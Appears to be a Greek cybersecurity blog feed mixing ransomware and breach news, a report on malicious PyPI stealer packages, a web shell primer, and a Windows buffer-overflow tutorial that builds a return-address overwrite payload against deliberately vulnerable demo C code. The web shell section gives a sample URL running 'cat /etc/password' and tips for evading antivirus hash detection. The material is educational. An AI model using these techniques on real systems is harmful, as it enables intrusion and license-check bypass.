Παρόλο που μετονομάστηκαν σε BlackMatter τον Ιούλιο του 2021, οι δραστηριότητές τους διακόπηκαν απότομα τον Νοέμβριο, όταν οι αρχές κατέσχεσαν τους διακομιστές τους και η εταιρεία ασφαλείας Emsisoft ανέπτυξε ένα εργαλείο αποκρυπτογράφησης που εκμεταλλευόταν μια ευπάθεια στο ransomware.

Η ομάδα αυτή αναγνωρίζεται σταθερά ως μία από τις πιο εξελιγμένες και υψηλού προφίλ ομάδες ransomware που στοχεύει επιχειρήσεις σε παγκόσμια κλίμακα, προσαρμόζοντας και βελτιώνοντας συνεχώς τις τακτικές της.

Για παράδειγμα, σε μια νέα προσέγγιση εκβιασμού το περασμένο καλοκαίρι, η BlackCat χρησιμοποίησε έναν ειδικό καθαρό δικτυακό ιστότοπο για να διαρρεύσει τα κλεμμένα δεδομένα ενός συγκεκριμένου θύματος, παρέχοντας στους πελάτες και τους υπαλλήλους του θύματος τα μέσα για να διαπιστώσουν αν τα δεδομένα τους είχαν εκτεθεί.

Πιο πρόσφατα, η BlackCat εισήγαγε τον Ιούλιο ένα API διαρροής δεδομένων που σχεδιάστηκε για να βελτιώσει τη διάδοση των κλεμμένων δεδομένων.

Αυτή την εβδομάδα, μία από τις θυγατρικές συμμορίες της BlackCat (που εντοπίζεται ως Scattered Spider) ανέλαβε την επίθεση στην MGM Resorts, λέγοντας ότι κρυπτογράφησαν πάνω από 100 ESXi hypervisors αφού η εταιρεία έθεσε εκτός λειτουργίας την εσωτερική της υποδομή και αρνήθηκε να διαπραγματευτεί την καταβολή λύτρων.

Τον περασμένο Απρίλιο, το FBI εξέδωσε προειδοποίηση επισημαίνοντας ότι η ομάδα βρισκόταν πίσω από τις επιτυχείς παραβιάσεις περισσότερων από 60 οντοτήτων παγκοσμίως μεταξύ Νοεμβρίου 2021 και Μαρτίου 2022.

Related posts:

Οι διακομιστές του καζίνο MGM κρυπτογραφήθηκαν από επίθεση ransomware Οι ShadowSyndicate χάκερ συνδέονται με πολλαπλές επιθέσεις ransomware Οι χάκερς στοχεύουν Azure cloud VMs μέσω παραβιασμένων διακομιστών SQL Αλήθειες και μύθοι σχετικά με το hacking

Σοκ για την Okta: Χάκερς Κλέβουν Δεδομένα Όλων των Χρηστών Συστήματος Υποστήριξης

Η Okta (OKTA.O) ανακοίνωσε την Τρίτη ότι χάκερς έκλεψαν πληροφορίες όλων των χρηστών του συστήματος υποστήριξης πελατών της σε μια παραβίαση του δικτύου πριν από δύο μήνες.

Η εταιρεία με έδρα το Σαν Φρανσίσκο ενημέρωσε τους πελάτες ότι κατέληξε ότι οι χάκερς απέκτησαν πρόσβαση σε δεδομένα, συμπεριλαμβανομένων ονομάτων και διευθύνσεων email, όλων των πελατών που χρησιμοποιούν το σύστημα υποστήριξης πελατών της.

Οι μετοχές της Okta κατέρρευσαν τον Οκτώβριο, αφού η εταιρεία δήλωσε ότι η παραβίαση επέτρεψε σε ορισμένους χάκερς να δουν αρχεία που είχαν ανεβάσει κάποιοι πελάτες.

“Παρόλο που δεν έχουμε άμεση γνώση ή αποδείξεις ότι αυτές οι πληροφορίες χρησιμοποιούνται ενεργά, ενημερώσαμε όλους τους πελάτες μας ότι βρίσκονται σε αυξημένο κίνδυνο ασφαλείας για επιθέσεις Phishing και social engineering”, ανέφερε η Okta.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Πληροφορίες σχετικά με τα Shell

Tα Web shells είναι μικρά προγραμματα η σκριπτακια τα οποια μπορούν να ανεβάσουν (upload) σε ευπαθείς servers και μετα να ανοιχτουν σε ενα προγραμμα περιηγησης παρεχοντας ενα web interface που θα εκτελει εντολες συστηματος.

Με λιγα λογια ειναι backdoors (οι λεγομενες κερκοπορτες) οι οποιες τρεχουνε απο ενα προγραμμα περιηγησης.

Για καθε server,το σκριπτακι η το web shell που θα χρησιμοποιηθει θα πρεπει να ειναι στη γλωσσα που τρεχει η χρησιμοποιει ο sever.(php,asp κτλ).Ετσι λοιπον, αν προκειται για εναν

php server τοτε θα πρεπει να βρουμε ενα php shell.Tα Web shells τρεχουν λιγο φτωχα στο παγκοσμιο ιστο για αυτο το λογο δεν υπαρχει καποια υποδοχη επικοινωνιας οπως χρησιμοποιητε στη περιπτωση του reverse shell οπου ο web server θα πρεπει να συνδεθει με ενα προγραμμα οπως πχ το netcat στου χακερ το μηχανημα ομως.

Για αυτο το λογο τα web shells ειναι πολυ γρηγορα στο στησιμο τους και την εφαρμογη τους.Ωστόσο το μειονέκτημα τους είναι ότι δεν έχουν το διαδραστικο ύφος ενός τερματικού.

Τα web shells παρεχουν ενα γρηγορο γραφικο περιβαλλον που μπορουν να κανουν τα ακολουθα.

1) να περιηγηθουν σε καταλογους

2) να εμφανισουν αρχεια

3) να παρεμβουν σε αρχεια η αν γραψουν αρχεια

4) να κατεβασει αρχεια

5) να διαγραψει αρχεια

6) να ανεβασει αρχεια

7) να εκετελεσει sql εντολες

8) να κανει bypass στην ασφαλεια

9) να εχει προσβαση σε καταλογους-υποκαταλογους.

10) να εκτελεσει εντολες των shells.

Web shells που υπαρχουν στο kali-linux βρισκονται σε αυτη τη διαδρομη

/usr/share/webshells/

Παρολο που περιεχει αρκετα χρησιμα web shells δεν περιέχει τα πιο ”καταστροφικα” που εχουν οι χακερς.

Το Web shell μπορει να τρεξει απο ενα προγραμμα περιηγησης με ενα url οπως αυτο http://target.com/simple-backdoor.php?cmd=cat+/etc/password

H Get παράμετρος cmd περιεχει την εντολή που θα τρεξει στο συστημα.Το σκριπτακι θα τρεξει την εντολη και θα στειλει πισω το αποτελεσμα.

Οι παράμετροι Get δεν είναι ο μονος τροπος να στελνουμε εντολες. Εντολες μπορουν να σταλθουν μεσω post μεσω cookies η ακομα και απο http.

Οι backdoors εχουν και τους περιορισμους τους.Πολλοι web servers εχουν απενεργοποιησει τη λειτουργια php που χρησιμοποιητε για να τρεξει εντολες.

Σε αυτη τη περιπτωση το web shell αποτυγχανει να τρεξει την εντολη.

Επισης ο σερβερ στοχος μπορει να εχει και firewall antivirus που εντοπιζουν τετιοα shells.H ανιχνευση βασιζεται στο hash md5 του αρχειου.

Σε αυτη τη περιπτωση η θα πρεπει να τροποποιησουμε το αρχειο σε μια καταληξη που να μην ειναι ανιχνευσιμη η να γραψουμε το δικο μας shell.

Tο να γραψουμε ενα δικο μας shell δεν ειναι δυσκολο εαν βεβαια γνωριζουμε τη γλωσσα php.

Related posts:

Ιδεολογία Hacking Διαφορές Hacker με Cracker Γιατί η αγορά ενός crypter μπορεί να αποβεί άχρηστη ? Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.

Εκατοντάδες κακόβουλα πακέτα Python κλέβουν ευαίσθητα δεδομένα

Μια κακόβουλη εκστρατεία που οι ερευνητές παρατήρησαν ότι γίνεται όλο και πιο σύνθετη κατά το τελευταίο εξάμηνο, εγκατέστησε σε πλατφόρμες ανοιχτού κώδικα εκατοντάδες πακέτα κλοπής πληροφοριών που μέτρησαν περίπου 75.000 λήψεις.

Η εκστρατεία παρακολουθείται από τις αρχές Απριλίου από τους αναλυτές της ομάδας Supply Chain Security της Checkmarx, οι οποίοι ανακάλυψαν 272 πακέτα με κώδικα για την κλοπή ευαίσθητων δεδομένων από στοχευμένα συστήματα.

Η επίθεση έχει εξελιχθεί σημαντικά από τότε που εντοπίστηκε για πρώτη φορά, με τους συγγραφείς των πακέτων να εφαρμόζουν όλο και πιο εξελιγμένα στρώματα απόκρυψης και τεχνικές αποφυγής εντοπισμού.

Οι ερευνητές λένε ότι άρχισαν να βλέπουν ένα μοτίβο “στο οικοσύστημα Python από τις αρχές Απριλίου 2023”.

Ένα παράδειγμα που παρέχεται είναι το αρχείο “_init_py”, το οποίο φορτώνει μόνο αφού ελέγξει ότι εκτελείται σε ένα σύστημα-στόχο και όχι σε ένα εικονικό περιβάλλον – ένα τυπικό σημάδι ενός ξενιστή ανάλυσης κακόβουλου λογισμικού.

Μόλις ξεκινήσει, στοχεύει τις ακόλουθες πληροφορίες στα μολυσμένα συστήματα:

• Εργαλεία προστασίας από ιούς που εκτελούνται στη συσκευή.
• Λίστα εργασιών, κωδικοί πρόσβασης Wi-Fi και πληροφορίες συστήματος.
• Τα διαπιστευτήρια, το ιστορικό περιήγησης, τα cookies και οι πληροφορίες πληρωμής που αποθηκεύονται στα προγράμματα περιήγησης ιστού.
• Δεδομένα σε εφαρμογές πορτοφολιού κρυπτονομισμάτων όπως το Atomic και το Exodus.
• Discord badges, αριθμοί τηλεφώνου, διευθύνσεις ηλεκτρονικού ταχυδρομείου και κατάσταση nitro.
• Δεδομένα χρηστών Minecraft και Roblox.

Επιπλέον, το κακόβουλο λογισμικό μπορεί να τραβήξει στιγμιότυπα οθόνης και να κλέψει μεμονωμένα αρχεία από το παραβιασμένο σύστημα, όπως οι κατάλογοι Desktop, Pictures, Documents, Music, Videos και Downloads.

Το πρόχειρο του θύματος παρακολουθείται επίσης συνεχώς για διευθύνσεις κρυπτονομισμάτων και το κακόβουλο λογισμικό τις ανταλλάσσει με τη διεύθυνση του επιτιθέμενου για να εκτρέψει τις πληρωμές σε πορτοφόλια που βρίσκονται υπό τον έλεγχό του.

Οι αναλυτές εκτιμούν ότι η εκστρατεία έκλεψε άμεσα περίπου 100.000 δολάρια σε κρυπτονόμισμα.

Χειραγώγηση εφαρμογών

Η Checkmarx αναφέρει ότι το κακόβουλο λογισμικό που χρησιμοποιήθηκε σε αυτή την εκστρατεία προχωρά ένα βήμα παραπέρα από τις τυπικές επιχειρήσεις κλοπής πληροφοριών, εμπλέκοντας τη χειραγώγηση δεδομένων εφαρμογών για να επιφέρει ένα πιο αποφασιστικό χτύπημα.

Για παράδειγμα, το αρχείο electron της εφαρμογής διαχείρισης πορτοφολιού κρυπτονομισμάτων Exodus αντικαθίσταται για να αλλοιώσει τα βασικά αρχεία, επιτρέποντας στους επιτιθέμενους να παρακάμψουν την Πολιτική Ασφάλειας Περιεχομένου (Content-Security-Policy) και να εξαφανίσουν δεδομένα.

Στο Discord, εάν είναι ενεργοποιημένες ορισμένες ρυθμίσεις, το κακόβουλο λογισμικό εισάγει κώδικα JavaScript που εκτελείται κατά την επανεκκίνηση του προγράμματος-πελάτη.

Το κακόβουλο λογισμικό χρησιμοποιεί επίσης ένα σενάριο PowerShell σε ένα υπερυψωμένο τερματικό για να χειραγωγήσει τους “κεντρικούς υπολογιστές” των Windows, ώστε τα προϊόντα ασφαλείας που εκτελούνται στην παραβιασμένη συσκευή να μην μπορούν να επικοινωνήσουν με τους διακομιστές τους.

Εξέλιξη της επίθεσης

Σύμφωνα με τους ερευνητές, ο κακόβουλος κώδικας αυτής της εκστρατείας σε πακέτα από τον Απρίλιο ήταν σαφώς ορατός, καθώς ήταν απλό κείμενο.

Τον Μάιο, όμως, οι συγγραφείς των πακέτων άρχισαν να προσθέτουν κρυπτογράφηση για να εμποδίσουν την ανάλυση. Τον Αύγουστο, ο ερευνητής παρατήρησε ότι στα πακέτα είχε προστεθεί συσκότιση πολλαπλών επιπέδων.

Σε μια ξεχωριστή έκθεση του ερευνητή της Checkmarx, Yahuda Gelb, αναφέρθηκε ότι δύο από τα πιο πρόσφατα πακέτα χρησιμοποιούσαν όχι λιγότερα από 70 επίπεδα συσκοτισμού.

Επίσης, τον Αύγουστο, οι προγραμματιστές του κακόβουλου λογισμικού συμπεριέλαβαν τη δυνατότητα απενεργοποίησης των προϊόντων προστασίας από ιούς, πρόσθεσαν το Telegram στη λίστα των στοχευμένων εφαρμογών και εισήγαγαν ένα εφεδρικό σύστημα διαφυγής δεδομένων.

Οι ερευνητές προειδοποιούν ότι οι κοινότητες ανοικτού κώδικα και τα οικοσυστήματα προγραμματιστών εξακολουθούν να είναι ευάλωτα σε επιθέσεις στην αλυσίδα εφοδιασμού και ότι οι φορείς απειλών ανεβάζουν καθημερινά κακόβουλα πακέτα σε ευρέως χρησιμοποιούμενα αποθετήρια και συστήματα ελέγχου εκδόσεων, όπως το GitHub, ή σε μητρώα πακέτων όπως το PyPi και το NPM.

Συνιστάται στους χρήστες να εξετάζουν προσεκτικά τα έργα και τους εκδότες πακέτων που εμπιστεύονται και να επαγρυπνούν σχετικά με τα ονόματα πακέτων που περιέχουν τυπογραφικά λάθη.

Ένας κατάλογος των κακόβουλων πακέτων που χρησιμοποιήθηκαν σε αυτή την εκστρατεία είναι διαθέσιμος εδώ.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Buffer Overflow (part IV)

Ήρθε η ώρα να προσπαθήσουμε να εκτελέσουμε buffer overflow (με ανακατεύθυνση) σε ένα λειτουργικό σύστημα  Windows 11. Για να δούμε πόσο εύκολο είναι να το κάνεις αυτό… 😎
Θα ακολουθήσουμε την ίδια μέθοδο όπως στο Part ΙΙ.
Ας ξεκινήσουμε με τον πηγαίο κώδικα του μικρού μας προγράμματος επίδειξης, του bufferoverflow.c:

Για όσους θέλουν να αντιγράψουν τον κώδικα, για να γράψουν τα δικά τους παραδείγματα – tests, Ορίστε:

#include <iostream>
#include <string>
#pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS
#pragma runtime_checks("", off)
#pragma optimize("", off)
using namespace std;

bool checkProductKey(char *userKey) {
    char key[12];
    strcpy(key, userKey);
    bool n = (strcmp(userKey, "123-456") == 0);
    return n;
}

int main(int argc, char* argv[]) {
    char key[255];
    if (argc != 2) {
        cout << "Enter product key >";
        cin >> key;
    }
    else
        strcpy(key, argv[1]);

    bool iAllow = checkProductKey(key);

    if (!iAllow) {
        cout << "Wrong key!\n";
        return -1;
    }

    cout << "Welcome to the DEMO SA Application.\n";
    cout << "(c) 2023 all rights reserved.\n";
    return 0;
}

Δεν θα μπω στον κόπο να εξηγήσω τι κάνει το παραπάνω πρόγραμμα μιας και ο κώδικας του είναι πολύ προφανής. Πρόκειται για πρόγραμμα σε C,  που τρέχει από τη γραμμή εντολών των Windows Powershell .
Παρακάτω βλέπετε την εκτέλεση του προγράμματος με διάφορες παραμέτρους :

Ένα από τα πιο σημαντικά σημεία για να δουλέψετε το bof  είναι να επιλέξετε τις σωστές παραμέτρους compiler & linker.

Χρησιμοποιώ ένα console project σε C++ στο Visual Studio 2022 και αλλάζω ορισμένες προεπιλεγμένες παραμέτρους όπως υποδεικνύουν οι παρακάτω εικόνες.
Σημειώστε ότι ορισμένες παραμέτρους τις έχω ήδη ρυθμίσει από τον πηγαίο κώδικα, χρησιμοποιώντας οδηγίες pragma, αλλά για λόγους σαφήνειας θα επαναλάβω όλη τη διαδικασία εδώ:

1. Απενεργοποιήστε το επίπεδο προειδοποίησης (όχι απολύτως απαραίτητο αλλά χρήσιμο για αυτό το μικρό πρόγραμμα για να αποφύγετε κάποια ενοχλητικά μηνύματα)
2. Απενεργοποιήστε τους ελέγχους κύκλου ζωής ανάπτυξης ασφαλούς κώδικα – SDL=Security Development Lifecycle.

Δεν θέλω ο Optimizer να αλλάξει τίποτα στον κώδικά μου… (και στις δύο παραπάνω περιπτώσεις)

1. Ορίζω τα runtime checks στο default
2. Απενεργοποιώ κάθε security check

1. Απενεργοποιώ το ASLR (Address Space Layout Randomization)

2. Απενεργοποιώ το DEP (Data Execution Prevention), για να μπορώ να εκτελέσω κώδικα στο τμήμα μνήμης του STACK. Αυτό είναι απαραίτητο μόνο εάν θα ήθελα να εκτελέσω έναν shell στo Stack, αλλά δεν είναι απαραίτητο εάν εκτελέσω ένα Buffer Overflow με και απλώς αντικαταστήσω τη διεύθυνση RET για να ανακατευθύνω το πρόγραμμά μου σε διαφορετική θέση στον ίδιο κώδικα (τμήμα) – όπως έκανα στο μέρος II σε ένα BOX Linux.

Για να συνοψίσω όλες τις επιλογές που έθεσα για τη μεταγλώττιση του προγράμματός μου:
/JMC /permissive- /ifcOutput "Debug\" /GS- /analyze- /W0 /Zc:wchar_t /ZI /Gm- /Od /sdl /Fd"Debug\vc143.pdb" /Zc:inline /fp:precise /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oy- /MDd /FC /Fa"Debug\" /EHsc /nologo /Fo"Debug\" /Fp"Debug\BufferOverflow.pch" /diagnostics:column

Ήρθε λοιπόν η ώρα να ξεκινήσω τις δοκιμές μου και να ελέγξω τη συμπεριφορά του προγράμματος. Θα κάνω δύο τύπους δοκιμών:

1. Στην πρώτη μου δοκιμή θα περάσω μια μεγάλη συμβολοσειρά ως παράμετρο, μεγαλύτερη από αυτή που ορίζεται στη γραμμή 9 (του πηγαίου κώδικα).
2. Στο δεύτερο τεστ θα περάσω μια σύντομη συμβολοσειρά ως παράμετρο, προκειμένου να ελέγξω την κανονική λειτουργία του προγράμματος.

Επιπλέον θα βάλω κάποια breakpoints και θα ελέγξω την κατάσταση της μνήμης και κάποιες σημαντικές σημαίες (flags).

Για την 1η δοκιμή μου (την υπερχείλιση) έβαλα αυτό το όρισμα γραμμής εντολών στο πρόγραμμα εντοπισμού σφαλμάτων:

Η γνωστή συμβολοσειρά (που χρησιμοποιείται σε δοκιμές bof) ενός μοτίβου 4 bytes (το μέγεθος μιας διεύθυνσης μνήμης σε συστήματα 32 bit): AAAABBBBCCCCDDDDEEEE.

Για το δεύτερο τεστ μου (το κανονικό!) εισάγω απλώς αυτό:

Έβαλα ένα σημείο διακοπής (breakpoint) στη γραμμή 24, εκεί που καλείται η συνάρτηση checkProductKey.
Επιπλέον, έχω ενεργοποιήσει τρία σημαντικά Windows για να έχω όσο το δυνατόν περισσότερες πληροφορίες.
Σημαντική σημείωση : Για να δείτε και να επιλέξετε τις παρακάτω επιλογές, το πρόγραμμα πρέπει να εκτελείται και να διακοπεί κάποιο breakpoint – διαφορετικά αυτές οι επιλογές δεν είναι ορατές).

1. Το Disassembly window (επιλέγοντας: Debug | Windows | Disassebly).
2. Το Memory window (επιλέγοντας: Debug | Windows | Memory | Memory 1)
3. Το Registers window (επιλέγοντας: Debug | Windows | Registers)

Ενώ η εκτέλεση έχει σταματήσει στο συγκεκριμένο σημείο διακοπής (στη γραμμή 24) επιλέγω το παράθυρο Disassembly:

[Κύρια εικόνα] : Όπως μπορούμε να δούμε την κλήση checkProductKey που βρίσκεται στη διεύθυνση μνήμης: 0x00414215 (θυμηθείτε: οι διευθύνσεις δίνονται σε δεκαεξαδική μορφή).

Συμβουλή: βλέπετε το textbox πάνω από το disassembly window – εκεί που λέει “Address: main(int, char * *)”: Εδώ μπορούμε να εισάγουμε για να δούμε τον κώδικα της κύριας συνάρτησης  ή μπορούμε να δώσουμε οποιαδήποτε άλλη function, όπως η checkProductKey.
Το ίδιο ισχύει και για το παράθυρο μνήμης (Memory window), εγώ το χρησιμοποιώ για να εισάγω διευθύνσεις μνήμης.

Συνεχίζω την εκτέλεση μέχρι το τελευταίο breakpoint, μέσα στη συνάρτηση checkProductKey , ακριβώς πριν η συνάρτηση επιστρέψει στον καλούντα της (στη γραμμή 12) παρακάτω:

Παραπάνω, βλέπω την κλασική δομή Stack.
Εάν ελέγξετε το παράθυρο Registers θα δείτε επίσης ότι ο Base Pointer βρίσκεται στη διεύθυνση 0x0019FD8C όπως φαίνεται στην εικόνα.
Αμέσως μετά τον Base Pointer βρίσκεται η Διεύθυνση RET. Αυτός είναι ο στόχος μου!

Συνεχίζοντας την εκτέλεση λαμβάνω ένα σφάλμα παραβίασης πρόσβασης :

Αν υποθέσουμε ότι διαβάσατε τα Parts IΙ και IIΙ, είναι πλέον εύκολο να καταλάβετε γιατί:
Όταν τελειώσει ο έλεγχος της συνάρτησης ProductKey, ο EIP λαμβάνει τη διεύθυνση RET (που έχει γεμίσει με “E” – 45 το οποίο είναι ο 16δικός κωδικός ascii του “E”) και προσπαθεί να επιστρέψει σε αυτήν τη διεύθυνση, την 0x45.45.45.45. Ωστόσο, αυτή η διεύθυνση δεν υπάρχει, εξ ου και το μήνυμα λάθους “Access violation reading location 0x45454545”.

Για λόγους σαφήνειας, επιτρέψτε μου να σας υπενθυμίσω ξανά κάποια πράγματα που συζητήσαμε στο Μέρος ΙΙ:
Το παρακάτω είναι μια σχηματική αναπαράσταση αυτού που βλέπουμε στη Στοίβα μας ενώ εκτελείται  η συνάρτηση checkProductKey : 

Εισάγοντας μια πολύ μεγάλη συμβολοσειρά που περνάει ως παράμετρος η συνάρτησή μας, υπερκαλύπτει και αντικαθιστά και τις διευθύνσεις: EBP και RET!

Κοιτάξτε τώρα, πώς φαίνεται η ίδια δομή κατά την εκτέλεση της 2ης δοκιμής μας: Η κανονική: “AAAAAAAAAA”

Εδώ, τα πράγματα είναι πιο ξεκάθαρα: Αφού τελειώσει η συνάρτηση, θα επιστρέψει στη διεύθυνση καλούντος της, όπως υποδεικνύουν οι διευθύνσεις RET είναι: 0x00414221 (θυμηθείτε ότι ακολουθείται το μοντέλο little endian  – διαβάζουμε από τη μνήμη με αντίστροφη σειρά).
Μπορείτε να διασταυρώσετε με το [Main Image] για να ελέγξετε την ακριβή διεύθυνση (το 0x00414221 ) που θα πάει η λειτουργικότητα του προγράμματός μας.
Αυτό σημαίνει επίσης (όπως είπαμε ήδη στα τρία προηγούμενα Parts των άρθρων μας), ότι ο EIP θα είναι 0x00414221.
Ή, με άλλα λόγια
EIP = RET Address (at lines 12 & 13 above) είναι αυτό που ονομάζουμε Function Epilogue.

Μέχρι στιγμής όλα καλά: Γνωρίζουμε την ακριβή συμβολοσειρά που θα μπορεί να αντικαταστήσει τη διεύθυνση RET. Αυτή είναι η “AAAABBBBCCCCDDDDEEEE”
Τώρα αυτό που πρέπει να κάνουμε είναι να αντικαταστήσουμε το EEEE με μια υπάρχουσα διεύθυνση για να ανακατευθύνουμε το πρόγραμμα για να παρακάμψουμε τον έλεγχο ProductKey.
Μπορούμε να βρούμε αυτή τη διεύθυνση διαβάζοντας τον disassembly κώδικα: Βρισκόταν μερικές διευθύνσεις κάτω (δεν φαίνεται στην εικόνα) της [Κύριας Εικόνας]. Εκεί που εμφανίζουμε τα μηνύματα καλωσορίσματος.
Είναι ακριβώς εδώ:

Αυτή είναι η διεύθυνση που ψάχνουμε: 0x41424D !!
Είμαστε έτοιμοι,… σχεδόν!!
Όπως γνωρίζουμε, βρισκόμαστε σε λειτουργία εντοπισμού σφαλμάτων (debug mode). Η πραγματική διεύθυνση του προγράμματος όταν εκτελείται σε release mode  είναι συνήθως μια ελαφρώς διαφορετική διεύθυνση…

Αυτό που χρειαζόμαστε στην πραγματικότητα είναι την διεύθυνση σε release mode. Για αυτόν τον λόγο δημιουργούμε το τελικό εκτελέσιμο αρχείο σε release mode:

Προσοχή στην παγίδα: Όταν αλλάζετε το πρόγραμμα από Debug σε Release mode, όλες οι παράμετροι compiler & linker επαναφέρονται στις προεπιλεγμένες τους τιμές { 👿 👿  }, επομένως πρέπει να τις επαναφέρετε ακολουθώντας τις ρυθμίσεις που έκανα στην αρχή του άρθρου.

Τέλος, δημιούργησα ένα εκτελέσιμο αρχείο που είναι πολύ μικρότερο από αυτό που είχα με τις πληροφορίες εντοπισμού σφαλμάτων.

Αλλά πώς στο καλό, μπορώ να βρώ αυτήν τη διεύθυνση τώρα, με δεδομένο ότι δεν μπορώ πια να ψάξω σε debug mode, μέσω του Visual Studio;

Χμ… εδώ χρειάζεται λίγο Reversing ακόμα… και για αυτό το λόγο θα χρησιμοποιήσω ένα παλιό εργαλείο που ονομάζεται: Olly Debugger v.1.1 . Φυσικά μπορείτε να χρησιμοποιήσετε όσες άλλες επιλογές θέλετε, πολλές από αυτές χρησιμοποιούνται για τον εντοπισμό σφαλμάτων / αποσυναρμολόγηση ενός εκτελέσιμου αρχείου, όπως x32dbg , IDA κ.λπ…
Εκτελώντας το τελικό εκτελέσιμο αρχείο στο Olly, μπορώ εύκολα να εντοπίσω τη διεύθυνση της συνάρτησης checkProductKey :

Όπως μπορείτε να δείτε παραπάνω, έχω αναδημιουργήσει το ίδιο περιβάλλον που είχα στη λειτουργία εντοπισμού σφαλμάτων του Visual Studio.
Όπως μπορείτε επίσης να δείτε (στο κάτω δεξιό μέρος – στο τμήμα της μνήμης), η διεύθυνση υπερχείλισης είναι λίγο… μεταγενέστερη σε σχέση με τη λειτουργία εντοπισμού σφαλμάτων. Το EBP συμπληρώνεται με 66.66.66.66 (“f”) ενώ εισάγω τη συμβολοσειρά “aaaaabbbbccddddeeeeeffff”. Αυτό σημαίνει ότι η διεύθυνση RET είναι αμέσως μετά το EBP, δηλαδή εδώ: aaaaabbbbccddddeeeeffffXXXX

Το ερώτημα τώρα είναι: Πού είναι η διεύθυνση που εμφανίζουμε τα μηνύματα καλωσορίσματος;
Αυτή είναι η διεύθυνση που πρέπει να βάλουμε στη θέση του XXXX παραπάνω για να αναγκάσουμε το πρόγραμμα να παρακάμψει όλους τους ελέγχους ProductKey.
Λοιπόν, δεν είναι τόσο δύσκολο να το βρείτε χρησιμοποιώντας τον Olly:

Ο μαγικός αριθμός είναι: 0x0040138B

Τώρα, ας δημιουργήσουμε το exploit μας σε ένα αρχείο χρησιμοποιώντας έναν Επεξεργαστή HEX. Αυτό είναι το εύκολο μέρος:

Θυμηθείτε, εισάγουμε το aaaaabbbbccccdddeeeeeffff 8B134000 . Θυμηθείτε τη διεύθυνση με αντίστροφη σειρά ανά byte: 8B.13.40.00 είναι η διεύθυνση διεύθυνση στόχος μας: 00.40.13.8B
και αποθηκεύω το αρχείο με το όνομα args στο δίσκο.
Λοιπόν… Ας το δοκιμάσουμε τώρα, για να δούμε τι έχουμε καταφέρει μέχρι τώρα:

Bingo! Καταφέραμε μια επιτυχημένη παράκαμψη των μέτρων ασφαλείας του προγράμματος με ανακατεύθυνση υπερχείλισης buffer!

Όπως μπορείτε να δείτε παρακάτω, η εκμετάλλευσή της αδυναμίας λειτουργεί επίσης και χωρίς να περάσω αναγκαστικά τα ορίσματα από την γραμμή εντολών. Χρησιμοποιώ την ανακατεύθυνση,…

Επίλογος

Αυτό είναι το τέλος της στοιχειώδους σειράς άρθρων μου σχετικά με τον τρόπο εκτέλεσης υπερχείλισης buffer και δοκιμής των αποτελεσμάτων και αποφυγής ορισμένων παγίδων.
Αυτό που θα ήθελα να δείξω στην πραγματικότητα, ΔΕΝ είναι μόνο πώς να κάνω το πραγματικό bof. Πιστεύω ότι αυτό που μετράει δεν είναι μόνο ο προορισμός αλλά το ίδιο το ταξίδι.
Η εμπειρία, τα εργαλεία, οι συμβουλές, τα κόλπα και οι παγίδες που αντιμετωπίζετε κατά τη διάρκεια του ταξιδιού, είναι ο πραγματικός στόχος.
Και αυτό δεν ισχύει μόνο για ένα ταπεινό Buffer Overflow… 😉

Happy Reversing and may the force be with you…

Related posts:

Τι είναι οι επιθέσεις «ψαρέματος» και πως να τις αποφύγουμε. Προστατεύοντας την Επιχείρησή σας: Η Σημασία της Κυβερνοασφάλειας Υποκλοπή Cookies: Προστατεύοντας την Ιδιωτικότητά σας στον Ψηφιακό Κόσμο Προστατεύοντας τον Ιστότοπό σας: Οι Αόρατοι Κίνδυνοι των Επιθέσεων XSS και Πώς να Αμυνθείτε

Κυβερνοεπίθεση Ransomware Παραλύει Ιταλική Δημόσια Διοίκηση

Στις 8 Δεκεμβρίου 2023, η ιταλική εταιρεία παροχής υπηρεσιών cloud, Westpole, έπεσε θύμα κυβερνοεπίθεσης ransomware, με επιπτώσεις στην πελάτισσά της, την PA Digitale, που παρέχει ψηφιακές υπηρεσίες σε δημόσιους φορείς. Η επίθεση, με την παραλλαγή Lockbit 3.0, παρέλυσε υπηρεσίες πολλών δήμων και άλλων οντοτήτων. Η Westpole ενημέρωσε τις αρχές και έναν επόπτη προστασίας δεδομένων.

Η εταιρεία προσπαθεί να ανακτήσει τα δεδομένα μετά την επίθεση, αλλά η έκταση των ζημιών παραμένει αβέβαιη. Πολλοί δήμοι επηρεάστηκαν, αναγκάζοντας τους να επιστρέψουν σε χειροκίνητες λειτουργίες. Η ιταλική κυβερνοασφάλεια προσπαθεί να ανακτήσει τα δεδομένα.

Ο πάροχος υπηρεσιών cloud διαβεβαίωσε ότι δεν υπήρξε διαρροή δεδομένων, αλλά οι επιπτώσεις είναι ανησυχητικές. Η επίθεση χαρακτηρίζεται ως η πιο σοβαρή που έχει πλήξει την ιταλική δημόσια διοίκηση.

Για την αντιμετώπιση τέτοιων επιθέσεων, συνιστάται εκπαίδευση των χρηστών, εγκατάσταση ενημερωμένου λογισμικού antivirus, διατήρηση ενημερωμένου λειτουργικού συστήματος, τακτικά αντίγραφα ασφαλείας και προσοχή στις λήψεις και τη χρήση αναθέσεων.

Related posts:

Θύμα επίθεσης το papaki.gr, δημοφιλής υπηρεσία καταχώρησης domains στη χώρα μας Η Μεγαλύτερη Συνεργασία Χάκερ στην Ιστορία: Μαζική Κυβερνοεπίθεση κατά Βαλτικής & Πολωνίας Τα πάντα σχετικά με το RFID και τις νέες ταυτότητες Αλήθειες και μύθοι σχετικά με το hacking

Πως θα σπάσετε WPA2-PSK Wi-Fi – FLUXION PART 2

Αυτο είναι το δεύτερο κομμάτι του οδηγού πως μπορούμε να σπάσουμε WPA2 με την χρήση του FLUXION.
